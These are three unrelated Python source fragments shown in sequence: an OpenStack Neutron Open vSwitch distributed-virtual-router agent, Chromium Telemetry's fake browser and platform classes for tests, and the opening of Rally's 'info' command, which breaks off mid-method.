self.csnat_ofport = ofport
def get_csnat_ofport(self):
return self.csnat_ofport
class OVSPort(object):
def __init__(self, id, ofport, mac, device_owner):
self.id = id
self.mac = mac
self.ofport = ofport
self.subnets = set()
self.device_owner = device_owner
def __str__(self):
return ("OVSPort: id = %s, ofport = %s, mac = %s, "
"device_owner = %s, subnets = %s" %
(self.id, self.ofport, self.mac,
self.device_owner, self.subnets))
def add_subnet(self, subnet_id):
self.subnets.add(subnet_id)
def remove_subnet(self, subnet_id):
self.subnets.remove(subnet_id)
def remove_all_subnets(self):
self.subnets.clear()
def get_subnets(self):
return self.subnets
def get_device_owner(self):
return self.device_owner
def get_mac(self):
return self.mac
def get_ofport(self):
return self.ofport
class OVSDVRNeutronAgent(object):
'''
Implements OVS-based DVR(Distributed Virtual Router), for overlay networks.
'''
# history
# 1.0 Initial version
def __init__(self, context, plugin_rpc, integ_br, tun_br,
bridge_mappings, phys_brs, int_ofports, phys_ofports,
patch_int_ofport=constants.OFPORT_INVALID,
patch_tun_ofport=constants.OFPORT_INVALID,
host=None, enable_tunneling=False,
enable_distributed_routing=False):
self.context = context
self.plugin_rpc = plugin_rpc
self.host = host
self.enable_tunneling = enable_tunneling
self.enable_distributed_routing = enable_distributed_routing
self.bridge_mappings = bridge_mappings
self.phys_brs = phys_brs
self.int_ofports = int_ofports
self.phys_ofports = phys_ofports
self.reset_ovs_parameters(integ_br, tun_br,
patch_int_ofport, patch_tun_ofport)
self.reset_dvr_parameters()
self.dvr_mac_address = None
if self.enable_distributed_routing:
self.get_dvr_mac_address()
def setup_dvr_flows(self):
self.setup_dvr_flows_on_integ_br()
self.setup_dvr_flows_on_tun_br()
self.setup_dvr_flows_on_phys_br()
self.setup_dvr_mac_flows_on_all_brs()
def reset_ovs_parameters(self, integ_br, tun_br,
patch_int_ofport, patch_tun_ofport):
'''Reset the openvswitch parameters'''
self.int_br = integ_br
self.tun_br = tun_br
self.patch_int_ofport = patch_int_ofport
self.patch_tun_ofport = patch_tun_ofport
def reset_dvr_parameters(self):
'''Reset the DVR parameters'''
self.local_dvr_map = {}
self.local_csnat_map = {}
self.local_ports = {}
self.registered_dvr_macs = set()
def get_dvr_mac_address(self):
try:
self.get_dvr_mac_address_with_retry()
except oslo_messaging.RemoteError as e:
LOG.warning(_LW('L2 agent could not get DVR MAC address at '
'startup due to RPC error. It happens when the '
'server does not support this RPC API. Detailed '
'message: %s'), e)
except oslo_messaging.MessagingTimeout:
LOG.error(_LE('DVR: Failed to obtain a valid local '
'DVR MAC address - L2 Agent operating '
'in Non-DVR Mode'))
if not self.in_distributed_mode():
# switch all traffic using L2 learning
# REVISIT(yamamoto): why to install the same flow as
# setup_integration_br?
self.int_br.install_normal()
def get_dvr_mac_address_with_retry(self):
# Get the local DVR MAC Address from the Neutron Server.
# This is the first place where we contact the server on startup
# so retry in case it's not ready to respond
for retry_count in reversed(range(5)):
try:
details = self.plugin_rpc.get_dvr_mac_address_by_host(
self.context, self.host)
except oslo_messaging.MessagingTimeout as e:
with excutils.save_and_reraise_exception() as ctx:
if retry_count > 0:
ctx.reraise = False
LOG.warning(_LW('L2 agent could not get DVR MAC '
'address from server. Retrying. '
'Detailed message: %s'), e)
else:
LOG.debug("L2 Agent DVR: Received response for "
"get_dvr_mac_address_by_host() from "
"plugin: %r", details)
self.dvr_mac_address = details['mac_address']
return
def setup_dvr_flows_on_integ_br(self):
'''Setup up initial dvr flows into br-int'''
if not self.in_distributed_mode():
return
LOG.info(_LI("L2 Agent operating in DVR Mode with MAC %s"),
self.dvr_mac_address)
# Remove existing flows in integration bridge
self.int_br.delete_flows()
# Add a canary flow to int_br to track OVS restarts
self.int_br.setup_canary_table()
# Insert 'drop' action as the default for Table DVR_TO_SRC_MAC
self.int_br.install_drop(table_id=constants.DVR_TO_SRC_MAC, priority=1)
self.int_br.install_drop(table_id=constants.DVR_TO_SRC_MAC_VLAN,
priority=1)
# Insert 'normal' action as the default for Table LOCAL_SWITCHING
self.int_br.install_normal(table_id=constants.LOCAL_SWITCHING,
priority=1)
for physical_network in self.bridge_mappings:
self.int_br.install_drop(table_id=constants.LOCAL_SWITCHING,
priority=2,
in_port=self.int_ofports[
physical_network])
def setup_dvr_flows_on_tun_br(self):
'''Setup up initial dvr flows into br-tun'''
if not self.enable_tunneling or not self.in_distributed_mode():
return
self.tun_br.install_goto(dest_table_id=constants.DVR_PROCESS,
priority=1,
in_port=self.patch_int_ofport)
# table-miss should be sent to learning table
self.tun_br.install_goto(table_id=constants.DVR_NOT_LEARN,
dest_table_id=constants.LEARN_FROM_TUN)
self.tun_br.install_goto(table_id=constants.DVR_PROCESS,
dest_table_id=constants.PATCH_LV_TO_TUN)
def setup_dvr_flows_on_phys_br(self):
'''Setup up initial dvr flows into br-phys'''
if not self.in_distributed_mode():
return
for physical_network in self.bridge_mappings:
self.phys_brs[physical_network].install_goto(
in_port=self.phys_ofports[physical_network],
priority=2,
dest_table_id=constants.DVR_PROCESS_VLAN)
self.phys_brs[physical_network].install_goto(
priority=1,
dest_table_id=constants.DVR_NOT_LEARN_VLAN)
self.phys_brs[physical_network].install_goto(
table_id=constants.DVR_PROCESS_VLAN,
priority=0,
dest_table_id=constants.LOCAL_VLAN_TRANSLATION)
self.phys_brs[physical_network].install_drop(
table_id=constants.LOCAL_VLAN_TRANSLATION,
in_port=self.phys_ofports[physical_network],
priority=2)
self.phys_brs[physical_network].install_normal(
table_id=constants.DVR_NOT_LEARN_VLAN,
priority=1)
def _add_dvr_mac_for_phys_br(self, physical_network, mac):
self.int_br.add_dvr_mac_vlan(mac=mac,
port=self.int_ofports[physical_network])
phys_br = self.phys_brs[physical_network]
phys_br.add_dvr_mac_vlan(mac=mac,
port=self.phys_ofports[physical_network])
def _remove_dvr_mac_for_phys_br(self, physical_network, mac):
# REVISIT(yamamoto): match in_port as well?
self.int_br.remove_dvr_mac_vlan(mac=mac)
phys_br = self.phys_brs[physical_network]
# REVISIT(yamamoto): match in_port as well?
phys_br.remove_dvr_mac_vlan(mac=mac)
def _add_dvr_mac_for_tun_br(self, mac):
self.int_br.add_dvr_mac_tun(mac=mac, port=self.patch_tun_ofport)
self.tun_br.add_dvr_mac_tun(mac=mac, port=self.patch_int_ofport)
def _remove_dvr_mac_for_tun_br(self, mac):
self.int_br.remove_dvr_mac_tun(mac=mac, port=self.patch_tun_ofport)
# REVISIT(yamamoto): match in_port as well?
self.tun_br.remove_dvr_mac_tun(mac=mac)
def _add_dvr_mac(self, mac):
for physical_network in self.bridge_mappings:
self._add_dvr_mac_for_phys_br(physical_network, mac)
if self.enable_tunneling:
self._add_dvr_mac_for_tun_br(mac)
LOG.debug("Added DVR MAC flow for %s", mac)
self.registered_dvr_macs.add(mac)
def _remove_dvr_mac(self, mac):
for physical_network in self.bridge_mappings:
self._remove_dvr_mac_for_phys_br(physical_network, mac)
if self.enable_tunneling:
self._remove_dvr_mac_for_tun_br(mac)
LOG.debug("Removed DVR MAC flow for %s", mac)
self.registered_dvr_macs.remove(mac)
def setup_dvr_mac_flows_on_all_brs(self):
if not self.in_distributed_mode():
LOG.debug("Not in distributed mode, ignoring invocation "
"of get_dvr_mac_address_list() ")
return
dvr_macs = self.plugin_rpc.get_dvr_mac_address_list(self.context)
LOG.debug("L2 Agent DVR: Received these MACs: %r", dvr_macs)
for mac in dvr_macs:
if mac['mac_address'] == self.dvr_mac_address:
continue
self._add_dvr_mac(mac['mac_address'])
def dvr_mac_address_update(self, dvr_macs):
if not self.dvr_mac_address:
LOG.debug("Self mac unknown, ignoring this "
"dvr_mac_address_update() ")
return
dvr_host_macs = set()
for entry in dvr_macs:
if entry['mac_address'] == self.dvr_mac_address:
continue
dvr_host_macs.add(entry['mac_address'])
if dvr_host_macs == self.registered_dvr_macs:
LOG.debug("DVR Mac address already up to date")
return
dvr_macs_added = dvr_host_macs - self.registered_dvr_macs
dvr_macs_removed = self.registered_dvr_macs - dvr_host_macs
for oldmac in dvr_macs_removed:
self._remove_dvr_mac(oldmac)
for newmac in dvr_macs_added:
self._add_dvr_mac(newmac)
def in_distributed_mode(self):
return self.dvr_mac_address is not None
def is_dvr_router_interface(self, device_owner):
return device_owner == n_const.DEVICE_OWNER_DVR_INTERFACE
def process_tunneled_network(self, network_type, lvid, segmentation_id):
self.tun_br.provision_local_vlan(
network_type=network_type,
lvid=lvid,
segmentation_id=segmentation_id,
distributed=self.in_distributed_mode())
def _bind_distributed_router_interface_port(self, port, lvm,
fixed_ips, device_owner):
# since distributed router port must have only one fixed
# IP, directly use fixed_ips[0]
fixed_ip = fixed_ips[0]
subnet_uuid = fixed_ip['subnet_id']
csnat_ofport = constants.OFPORT_INVALID
ldm = None
if subnet_uuid in self.local_dvr_map:
ldm = self.local_dvr_map[subnet_uuid]
csnat_ofport = ldm.get_csnat_ofport()
if csnat_ofport == constants.OFPORT_INVALID:
LOG.error(_LE("DVR: Duplicate DVR router interface detected "
"for subnet %s"), subnet_uuid)
return
else:
# set up LocalDVRSubnetMapping available for this subnet
subnet_info = self.plugin_rpc.get_subnet_for_dvr(self.context,
subnet_uuid)
if not subnet_info:
LOG.error(_LE("DVR: Unable to retrieve subnet information "
"for subnet_id %s"), subnet_uuid)
return
LOG.debug("get_subnet_for_dvr for subnet %(uuid)s "
"returned with %(info)s",
{"uuid": subnet_uuid, "info": subnet_info})
ldm = LocalDVRSubnetMapping(subnet_info)
self.local_dvr_map[subnet_uuid] = ldm
# DVR takes over
ldm.set_dvr_owned(True)
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
vlan_to_use = lvm.segmentation_id
subnet_info = ldm.get_subnet_info()
ip_version = subnet_info['ip_version']
local_compute_ports = (
self.plugin_rpc.get_ports_on_host_by_subnet(
self.context, self.host, subnet_uuid))
LOG.debug("DVR: List of ports received from "
"get_ports_on_host_by_subnet %s",
local_compute_ports)
for prt in local_compute_ports:
vif = self.int_br.get_vif_port_by_id(prt['id'])
if not vif:
continue
ldm.add_compute_ofport(vif.vif_id, vif.ofport)
if vif.vif_id in self.local_ports:
# ensure if a compute port is already on
# a different dvr routed subnet
# if yes, queue this subnet to that port
comp_ovsport = self.local_ports[vif.vif_id]
comp_ovsport.add_subnet(subnet_uuid)
else:
# the compute port is discovered first here that its on
# a dvr routed subnet queue this subnet to that port
comp_ovsport = OVSPort(vif.vif_id, vif.ofport,
vif.vif_mac, prt['device_owner'])
comp_ovsport.add_subnet(subnet_uuid)
self.local_ports[vif.vif_id] = comp_ovsport
# create rule for just this vm port
self.int_br.install_dvr_to_src_mac(
network_type=lvm.network_type,
vlan_tag=vlan_to_use,
gateway_mac=subnet_info['gateway_mac'],
dst_mac=comp_ovsport.get_mac(),
dst_port=comp_ovsport.get_ofport())
if lvm.network_type == p_const.TYPE_VLAN:
# TODO(vivek) remove the IPv6 related flows once SNAT is not
# used for IPv6 DVR.
br = self.phys_brs[lvm.physical_network]
if lvm.network_type in constants.TUNNEL_NETWORK_TYPES:
br = self.tun_br
# TODO(vivek) remove the IPv6 related flows once SNAT is not
# used for IPv6 DVR.
if ip_version == 4:
br.install_dvr_process_ipv4(
vlan_tag=lvm.vlan, gateway_ip=subnet_info['gateway_ip'])
else:
br.install_dvr_process_ipv6(
vlan_tag=lvm.vlan, gateway_mac=subnet_info['gateway_mac'])
br.install_dvr_process(
vlan_tag=lvm.vlan, vif_mac=port.vif_mac,
dvr_mac_address=self.dvr_mac_address)
# the dvr router interface is itself a port, so capture it
# queue this subnet to that port. A subnet appears only once as
# a router interface on any given router
ovsport = OVSPort(port.vif_id, port.ofport,
port.vif_mac, device_owner)
ovsport.add_subnet(subnet_uuid)
self.local_ports[port.vif_id] = ovsport
def _bind_port_on_dvr_subnet(self, port, lvm, fixed_ips,
device_owner):
# Handle new compute port added use-case
subnet_uuid = None
for ips in fixed_ips:
if ips['subnet_id'] not in self.local_dvr_map:
continue
subnet_uuid = ips['subnet_id']
ldm = self.local_dvr_map[subnet_uuid]
if not ldm.is_dvr_owned():
# well this is CSNAT stuff, let dvr come in
# and do plumbing for this vm later
continue
# This confirms that this compute port belongs
# to a dvr hosted subnet.
# Accommodate this VM Port into the existing rule in
# the integration bridge
LOG.debug("DVR: Plumbing compute port %s", port.vif_id)
subnet_info = ldm.get_subnet_info()
ldm.add_compute_ofport(port.vif_id, port.ofport)
if port.vif_id in self.local_ports:
# ensure if a compute port is already on a different
# dvr routed subnet
# if yes, queue this subnet to that port
ovsport = self.local_ports[port.vif_id]
ovsport.add_subnet(subnet_uuid)
else:
# the compute port is discovered first here that its
# on a dvr routed subnet, queue this subnet to that port
ovsport = OVSPort(port.vif_id, port.ofport,
port.vif_mac, device_owner)
ovsport.add_subnet(subnet_uuid)
self.local_ports[port.vif_id] = ovsport
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
vlan_to_use = lvm.segmentation_id
# create a rule for this vm port
self.int_br.install_dvr_to_src_mac(
network_type=lvm.network_type,
vlan_tag=vlan_to_use,
gateway_mac=subnet_info['gateway_mac'],
dst_mac=ovsport.get_mac(),
dst_port=ovsport.get_ofport())
def _bind_centralized_snat_port_on_dvr_subnet(self, port, lvm,
fixed_ips, device_owner):
# since centralized-SNAT (CSNAT) port must have only one fixed
# IP, directly use fixed_ips[0]
fixed_ip = fixed_ips[0]
if port.vif_id in self.local_ports:
# throw an error if CSNAT port is already on a different
# dvr routed subnet
ovsport = self.local_ports[port.vif_id]
subs = list(ovsport.get_subnets())
if subs[0] == fixed_ip['subnet_id']:
return
LOG.error(_LE("Centralized-SNAT port %(port)s on subnet "
"%(port_subnet)s already seen on a different "
"subnet %(orig_subnet)s"), {
"port": port.vif_id,
"port_subnet": fixed_ip['subnet_id'],
"orig_subnet": subs[0],
})
return
subnet_uuid = fixed_ip['subnet_id']
ldm = None
subnet_info = None
if subnet_uuid not in self.local_dvr_map:
# no csnat ports seen on this subnet - create csnat state
# for this subnet
subnet_info = self.plugin_rpc.get_subnet_for_dvr(self.context,
subnet_uuid)
ldm = LocalDVRSubnetMapping(subnet_info, port.ofport)
self.local_dvr_map[subnet_uuid] = ldm
else:
ldm = self.local_dvr_map[subnet_uuid]
subnet_info = ldm.get_subnet_info()
# Store csnat OF Port in the existing DVRSubnetMap
ldm.set_csnat_ofport(port.ofport)
# create ovsPort footprint for csnat port
ovsport = OVSPort(port.vif_id, port.ofport,
port.vif_mac, device_owner)
ovsport.add_subnet(subnet_uuid)
self.local_ports[port.vif_id] = ovsport
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
vlan_to_use = lvm.segmentation_id
self.int_br.install_dvr_to_src_mac(
network_type=lvm.network_type,
vlan_tag=vlan_to_use,
gateway_mac=subnet_info['gateway_mac'],
dst_mac=ovsport.get_mac(),
dst_port=ovsport.get_ofport())
def bind_port_to_dvr(self, port, local_vlan_map,
fixed_ips, device_owner):
if not self.in_distributed_mode():
return
if local_vlan_map.network_type not in (constants.TUNNEL_NETWORK_TYPES
+ [p_const.TYPE_VLAN]):
LOG.debug("DVR: Port %s is with network_type %s not supported"
" for dvr plumbing" % (port.vif_id,
local_vlan_map.network_type))
return
if device_owner == n_const.DEVICE_OWNER_DVR_INTERFACE:
self._bind_distributed_router_interface_port(port,
local_vlan_map,
fixed_ips,
device_owner)
if device_owner and n_utils.is_dvr_serviced(device_owner):
self._bind_port_on_dvr_subnet(port, local_vlan_map,
fixed_ips,
device_owner)
if device_owner == n_const.DEVICE_OWNER_ROUTER_SNAT:
self._bind_centralized_snat_port_on_dvr_subnet(port,
local_vlan_map,
fixed_ips,
device_owner)
def _unbind_distributed_router_interface_port(self, port, lvm):
ovsport = self.local_ports[port.vif_id]
# removal of distributed router interface
subnet_ids = ovsport.get_subnets()
subnet_set = set(subnet_ids)
network_type = lvm.network_type
physical_network = lvm.physical_network
vlan_to_use = lvm.vlan
if network_type == p_const.TYPE_VLAN:
vlan_to_use = lvm.segmentation_id
# ensure we process for all the subnets laid on this removed port
for sub_uuid in subnet_set:
if sub_uuid not in self.local_dvr_map:
continue
ldm = self.local_dvr_map[sub_uuid]
subnet_info = ldm.get_subnet_info()
ip_version = subnet_info['ip_version']
# DVR is no more owner
ldm.set_dvr_owned(False)
# remove all vm rules for this dvr subnet
# clear of compute_ports altogether
compute_ports = ldm.get_compute_ofports()
for vif_id in compute_ports:
comp_port = self.local_ports[vif_id]
self.int_br.delete_dvr_to_src_mac(
network_type=network_type,
vlan_tag=vlan_to_use, dst_mac=comp_port.get_mac())
ldm.remove_all_compute_ofports()
if ldm.get_csnat_ofport() == constants.OFPORT_INVALID:
# if there is no csnat port for this subnet, remove
# this subnet from local_dvr_map, as no dvr (or) csnat
# ports available on this agent anymore
self.local_dvr_map.pop(sub_uuid, None)
if network_type == p_const.TYPE_VLAN:
br = self.phys_br[physical_network]
if network_type in constants.TUNNEL_NETWORK_TYPES:
br = self.tun_br
if ip_version == 4:
br.delete_dvr_process_ipv4(
vlan_tag=lvm.vlan, gateway_ip=subnet_info['gateway_ip'])
else:
br.delete_dvr_process_ipv6(
vlan_tag=lvm.vlan, gateway_mac=subnet_info['gateway_mac'])
ovsport.remove_subnet(sub_uuid)
if lvm.network_type == p_const.TYPE_VLAN:
br = self.phys_br[physical_network]
if lvm.network_type in constants.TUNNEL_NETWORK_TYPES:
br = self.tun_br
br.delete_dvr_process(vlan_tag=lvm.vlan, vif_mac=port.vif_mac)
# release port state
self.local_ports.pop(port.vif_id, None)
def _unbind_port_on_dvr_subnet(self, port, lvm):
ovsport = self.local_ports[port.vif_id]
# This confirms that this compute port being removed belonged
# to a dvr hosted subnet.
LOG.debug("DVR: Removing plumbing for compute port %s", port)
subnet_ids = ovsport.get_subnets()
# ensure we process for all the subnets laid on this port
for sub_uuid in subnet_ids:
if sub_uuid not in self.local_dvr_map:
continue
ldm = self.local_dvr_map[sub_uuid]
ldm.remove_compute_ofport(port.vif_id)
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
vlan_to_use = lvm.segmentation_id
# first remove this vm port rule
self.int_br.delete_dvr_to_src_mac(
network_type=lvm.network_type,
vlan_tag=vlan_to_use, dst_mac=ovsport.get_mac())
# release port state
self.local_ports.pop(port.vif_id, None)
def _unbind_centralized_snat_port_on_dvr_subnet(self, port, lvm):
ovsport = self.local_ports[port.vif_id]
# This confirms that this compute port being removed belonged
# to a dvr hosted subnet.
LOG.debug("DVR: Removing plumbing for csnat port %s", port)
sub_uuid = list(ovsport.get_subnets())[0]
# ensure we process for all the subnets laid on this port
if sub_uuid not in self.local_dvr_map:
return
ldm = self.local_dvr_map[sub_uuid]
ldm.set_csnat_ofport(constants.OFPORT_INVALID)
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
vlan_to_use = lvm.segmentation_id
# then remove csnat port rule
self.int_br.delete_dvr_to_src_mac(
network_type=lvm.network_type,
vlan_tag=vlan_to_use, dst_mac=ovsport.get_mac())
if not ldm.is_dvr_owned():
# if not owned by DVR (only used for csnat), remove this
# subnet state altogether
self.local_dvr_map.pop(sub_uuid, None)
# release port state
self.local_ports.pop(port.vif_id, None)
def unbind_port_from_dvr(self, vif_port, local_vlan_map):
if not self.in_distributed_mode():
return
# Handle port removed use-case
if vif_port and vif_port.vif_id not in self.local_ports:
LOG.debug("DVR: Non distributed port, ignoring %s", vif_port)
return
ovsport = self.local_ports[vif_port.vif_id]
device_owner = ovsport.get_device_owner()
if device_owner == n_const.DEVICE_OWNER_DVR_INTERFACE:
self._unbind_distributed_router_interface_port(vif_port,
local_vlan_map)
if device_owner and n_utils.is_dvr_serviced(device_owner):
self._unbind_port_on_dvr_subnet(vif_port,
local_vlan_map)
if device_owner == n_const.DEVICE_OWNER_ROUTER_SNAT:
self._unbind_centralized_snat_port_on_dvr_subnet(vif_port,
local_vlan_map)
|
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides fakes for several of Telemetry's internal objects.
These allow code like story_runner and Benchmark to be run and tested
without compiling or starting a browser. Class names prepended with an
underscore are intended to be implementation details, and should not
be subclassed; however, some, like _FakeBrowser, have public APIs that
may need to be called in tests.
"""
from telemetry.internal.backends.chrome_inspector import websocket
from telemetry.internal.browser import browser_options
from telemetry.internal.platform import system_info
from telemetry.page import shared_page_state
from telemetry.util import image_util
from telemetry.testing.internal import fake_gpu_info
# Classes and functions which are intended to be part of the public
# fakes API.
class FakePlatform(object):
@property
def is_host_platform(self):
raise NotImplementedError
@property
def network_controller(self):
return _FakeNetworkController()
@property
def tracing_controller(self):
return None
def CanMonitorThermalThrottling(self):
return False
def IsThermallyThrottled(self):
return False
def HasBeenThermallyThrottled(self):
return False
def GetDeviceTypeName(self):
raise NotImplementedError
def GetArchName(self):
raise NotImplementedError
def GetOSName(self):
raise NotImplementedError
def GetOSVersionName(self):
raise NotImplementedError
def StopAllLocalServers(self):
pass
class FakeLinuxPlatform(FakePlatform):
def __init__(self):
super(FakeLinuxPlatform, self).__init__()
self.screenshot_png_data = None
self.http_server_directories = []
self.http_server = FakeHTTPServer()
@property
def is_host_platform(self):
return True
def GetDeviceTypeName(self):
return 'Desktop'
def GetArchName(self):
return 'x86_64'
def GetOSName(self):
return 'linux'
def GetOSVersionName(self):
return 'trusty'
def CanTakeScreenshot(self):
return bool(self.screenshot_png_data)
def TakeScreenshot(self, file_path):
if not self.CanTakeScreenshot():
raise NotImplementedError
img = image_util.FromBase64Png(self.screenshot_png_data)
image_util.WritePngFile(img, file_path)
return True
def SetHTTPServerDirectories(self, paths):
self.http_server_directories.append(paths)
class FakeHTTPServer(object):
def UrlOf(self, url):
del url # unused
return 'file:///foo'
class FakePossibleBrowser(object):
def __init__(self):
self._returned_browser = _FakeBrowser(FakeLinuxPlatform())
self.browser_type = 'linux'
self.supports_tab_control = False
self.is_remote = False
@property
def returned_browser(self):
"""The browser object that will be returned through later API calls."""
return self._returned_browser
def Create(self, finder_options):
del finder_options # unused
return self.returned_browser
@property
def platform(self):
"""The platform object from the returned browser.
To change this or set it up, change the returned browser's
platform.
"""
return self.returned_browser.platform
def IsRemote(self):
return self.is_remote
def SetCredentialsPath(self, _):
pass
class FakeSharedPageState(shared_page_state.SharedPageState):
def __init__(self, test, finder_options, story_set):
super(FakeSharedPageState, self).__init__(test, finder_options, story_set)
def _GetPossibleBrowser(self, test, finder_options):
p = FakePossibleBrowser()
self.ConfigurePossibleBrowser(p)
return p
def ConfigurePossibleBrowser(self, possible_browser):
"""Override this to configure the PossibleBrowser.
Can make changes to the browser's configuration here via e.g.:
possible_browser.returned_browser.returned_system_info = ...
"""
pass
def DidRunStory(self, results):
# TODO(kbr): add a test which throws an exception from DidRunStory
# to verify the fix from https://crrev.com/86984d5fc56ce00e7b37ebe .
super(FakeSharedPageState, self).DidRunStory(results)
class FakeSystemInfo(system_info.SystemInfo):
def __init__(self, model_name='', gpu_dict=None):
if gpu_dict == None:
gpu_dict = fake_gpu_info.FAKE_GPU_INFO
super(FakeSystemInfo, self).__init__(model_name, gpu_dict)
class _FakeBrowserFinderOptions(browser_options.BrowserFinderOptions):
def __init__(self, *args, **kwargs):
browser_options.BrowserFinderOptions.__init__(self, *args, **kwargs)
self.fake_possible_browser = FakePossibleBrowser()
def CreateBrowserFinderOptions(browser_type=None):
"""Creates fake browser finder options for discovering a browser."""
return _FakeBrowserFinderOptions(browser_type=browser_type)
# Internal classes. Note that end users may still need to both call
# and mock out methods of these classes, but they should not be
# subclassed.
class _FakeBrowser(object):
def __init__(self, platform):
self._tabs = _FakeTabList(self)
self._returned_system_info = FakeSystemInfo()
self._platform = platform
self._browser_type = 'release'
@property
def platform(self):
return self._platform
@platform.setter
def platform(self, incoming):
"""Allows overriding of the fake browser's platform object."""
assert isinstance(incoming, FakePlatform)
self._platform = incoming
@property
def returned_system_info(self):
"""The object which will be returned from calls to GetSystemInfo."""
return self._returned_system_info
@returned_system_info.setter
def returned_system_info(self, incoming):
"""Allows overriding of the returned SystemInfo object.
Incoming argument must be an instance of FakeSystemInfo."""
assert isinstance(incoming, FakeSystemInfo)
self._returned_system_info = incoming
@property
def browser_type(self):
"""The browser_type this browser claims to be ('debug', 'release', etc.)"""
return self._browser_type
@browser_type.setter
def browser_type(self, incoming):
"""Allows setting of the browser_type."""
self._browser_type = incoming
@property
def credentials(self):
return _FakeCredentials()
def Close(self):
pass
@property
def supports_system_info(self):
return True
def GetSystemInfo(self):
return self.returned_system_info
@property
def supports_tab_control(self):
return True
@property
def tabs(self):
return self._tabs
class _FakeCredentials(object):
def WarnIfMissingCredentials(self, _):
pass
class _FakeNetworkController(object):
def SetReplayArgs(self, *args, **kwargs):
pass
def UpdateReplayForExistingBrowser(self):
pass
class _FakeTab(object):
def __init__(self, browser, tab_id):
self._browser = browser
self._tab_id = str(tab_id)
self._collect_garbage_count = 0
self.test_png = None
@property
def collect_garbage_count(self):
return self._collect_garbage_count
@property
def id(self):
return self._tab_id
@property
def browser(self):
return self._browser
def WaitForDocumentReadyStateToBeComplete(self, timeout=0):
pass
def Navigate(self, url, script_to_evaluate_on_commit=None,
timeout=0):
pass
def WaitForDocumentReadyStateToBeInteractiveOrBetter(self, timeout=0):
pass
def IsAlive(self):
return True
def CloseConnections(self):
pass
def CollectGarbage(self):
self._collect_garbage_count += 1
def Close(self):
pass
@property
def screenshot_supported(self):
return self.test_png is not None
def Screenshot(self):
assert self.screenshot_supported, 'Screenshot is not supported'
return image_util.FromBase64Png(self.test_png)
class _FakeTabList(object):
_current_tab_id = 0
def __init__(self, browser):
self._tabs = []
self._browser = browser
def New(self, timeout=300):
del timeout # unused
type(self)._current_tab_id += 1
t = _FakeTab(self._browser, type(self)._current_tab_id)
self._tabs.append(t)
return t
def __iter__(self):
return self._tabs.__iter__()
def __len__(self):
return len(self._tabs)
def __getitem__(self, index):
return self._tabs[index]
def GetTabById(self, identifier):
"""The identifier of a tab can be accessed with tab.id."""
for tab in self._tabs:
if tab.id == identifier:
return tab
return None
class FakeInspectorWebsocket(object):
_NOTIFICATION_EVENT = 1
_NOTIFICATION_CALLBACK = 2
"""A fake InspectorWebsocket.
A fake that allows tests to send pregenerated data. Normal
InspectorWebsockets allow for any number of domain handlers. This fake only
allows up to 1 domain handler, and assumes that the domain of the response
always matches that of the handler.
"""
def __init__(self, mock_timer):
self._mock_timer = mock_timer
self._notifications = []
self._response_handlers = {}
self._pending_callbacks = {}
self._handler = None
def RegisterDomain(self, _, handler):
self._handler = handler
def AddEvent(self, method, params, time):
if self._notifications:
assert self._notifications[-1][1] < time, (
'Current response is scheduled earlier than previous response.')
response = {'method': method, 'params': params}
self._notifications.append((response, time, self._NOTIFICATION_EVENT))
def AddAsyncResponse(self, method, result, time):
if self._notifications:
assert self._notifications[-1][1] < time, (
'Current response is scheduled earlier than previous response.')
response = {'method': method, 'result': result}
self._notifications.append((response, time, self._NOTIFICATION_CALLBACK))
def AddResponseHandler(self, method, handler):
self._response_handlers[method] = handler
def SyncRequest(self, request, *args, **kwargs):
del args, kwargs # unused
handler = self._response_handlers[request['method']]
return handler(request) if handler else None
def AsyncRequest(self, request, callback):
self._pending_callbacks.setdefault(request['method'], []).append(callback)
def SendAndIgnoreResponse(self, request):
pass
def Connect(self, _):
pass
def DispatchNotifications(self, timeout):
current_time = self._mock_timer.time()
if not self._notifications:
self._mock_timer.SetTime(current_time + timeout + 1)
raise websocket.WebSocketTimeoutException()
response, time, kind = self._notifications[0]
if time - current_time > timeout:
self._mock_timer.SetTime(current_time + timeout + 1)
raise websocket.WebSocketTimeoutException()
self._notifications.pop(0)
self._mock_timer.SetTime(time + 1)
if kind == self._NOTIFICATION_EVENT:
self._handler(response)
elif kind == self._NOTIFICATION_CALLBACK:
callback = self._pending_callbacks.get(response['method']).pop(0)
callback(response)
else:
raise Exception('Unexpected response type')
|
|
# Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Rally command: info
Samples:
$ rally info find create_meter_and_get_stats
CeilometerStats.create_meter_and_get_stats (benchmark scenario).
Test creating a meter and fetching its statistics.
Meter is first created and then statistics is fetched for the same
using GET /v2/meters/(meter_name)/statistics.
Parameters:
- name_length: length of generated (random) part of meter name
- kwargs: contains optional arguments to create a meter
$ rally info find Authenticate
Authenticate (benchmark scenario group).
This class should contain authentication mechanism.
Benchmark scenarios:
---------------------------------------------------------
Name Description
---------------------------------------------------------
Authenticate.keystone
Authenticate.validate_cinder Check Cinder Client ...
Authenticate.validate_glance Check Glance Client ...
Authenticate.validate_heat Check Heat Client ...
$ rally info find some_non_existing_benchmark
Failed to find any docs for query: 'some_non_existing_benchmark'
"""
from __future__ import print_function
from rally.benchmark.scenarios import base as scenario_base
from rally.benchmark.sla import base as sla_base
from rally.cmd import cliutils
from rally.common import utils
from rally import deploy
from rally.deploy import serverprovider
from rally import exceptions
class InfoCommands(object):
"""This command allows you to get quick doc of some rally entities.
Available for scenario groups, scenarios, SLA, deploy engines and
server providers.
Usage:
$ rally info find <query>
To get information about main concepts of Rally as well as to list entities
you can query docs for, type one of the following:
$ rally info BenchmarkScenarios
$ rally info SLA
$ rally info DeploymentEngines
$ rally info ServerProviders
"""
@cliutils.args("--query", dest="query", type=str, help="Search query.")
def find(self, query):
"""Search for an entity that matches the query and print info about it.
:param query: search query.
"""
